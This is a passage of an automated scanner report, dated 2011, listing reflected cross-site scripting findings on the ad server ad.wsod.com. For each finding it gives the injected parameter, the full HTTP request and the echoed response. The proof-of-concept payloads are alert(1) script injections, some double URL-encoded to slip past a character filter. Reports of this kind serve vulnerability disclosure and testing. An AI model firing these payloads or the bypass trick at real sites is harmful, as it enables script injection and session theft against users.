P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2658

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357739ff";alert(1)//281133da14/477.0.iframe.150x30/1300830282**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14
...[SNIP]...

1.136. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3440%2522%253balert%25281%2529%252f%252f23397f4688a was submitted in the REST URL parameter 3. This input was echoed as e3440";alert(1)//23397f4688a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30e3440%2522%253balert%25281%2529%252f%252f23397f4688a/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2661

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30e3440";alert(1)//23397f4688a/1300830310**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin
...[SNIP]...

1.137. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77dbf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4410d9a1d was submitted in the REST URL parameter 3. This input was echoed as 77dbf"><script>alert(1)</script>4410d9a1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x3077dbf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4410d9a1d/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2700

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x3077dbf"><script>alert(1)</script>4410d9a1d/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.138. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f05"-alert(1)-"b4013011ca was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*b0f05"-alert(1)-"b4013011ca HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2631

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*b0f05"-alert(1)-"b4013011ca">
...[SNIP]...

1.139. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52e39"><script>alert(1)</script>1ef8e8bc06e was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*52e39"><script>alert(1)</script>1ef8e8bc06e HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2663

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*52e39"><script>alert(1)</script>1ef8e8bc06ehttp://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.140. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 148c5"-alert(1)-"81be9749a7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*&148c5"-alert(1)-"81be9749a7c=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2639

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
9/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*&148c5"-alert(1)-"81be9749a7c=1">
...[SNIP]...

1.141. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eee0"><script>alert(1)</script>6e2d4d7b31a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*&9eee0"><script>alert(1)</script>6e2d4d7b31a=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2669

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
9/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*&9eee0"><script>alert(1)</script>6e2d4d7b31a=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.142. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [ybt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of the ybt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 730fc</script><script>alert(1)</script>bd8245d2a0a was submitted in the ybt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319730fc</script><script>alert(1)</script>bd8245d2a0a&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830206**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319730fc</script><script>alert(1)</script>bd8245d2a0a&&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239
...[SNIP]...

1.143. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [yhdata parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of the yhdata request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7b4c</script><script>alert(1)</script>a92a4ea5c17 was submitted in the yhdata parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=e7b4c</script><script>alert(1)</script>a92a4ea5c17&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:37:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300829823**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=e7b4c</script><script>alert(1)</script>a92a4ea5c17&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW8
...[SNIP]...

1.144. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [yyob parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of the yyob request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56e5b</script><script>alert(1)</script>23422258c5c was submitted in the yyob parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=56e5b</script><script>alert(1)</script>23422258c5c&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:40:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
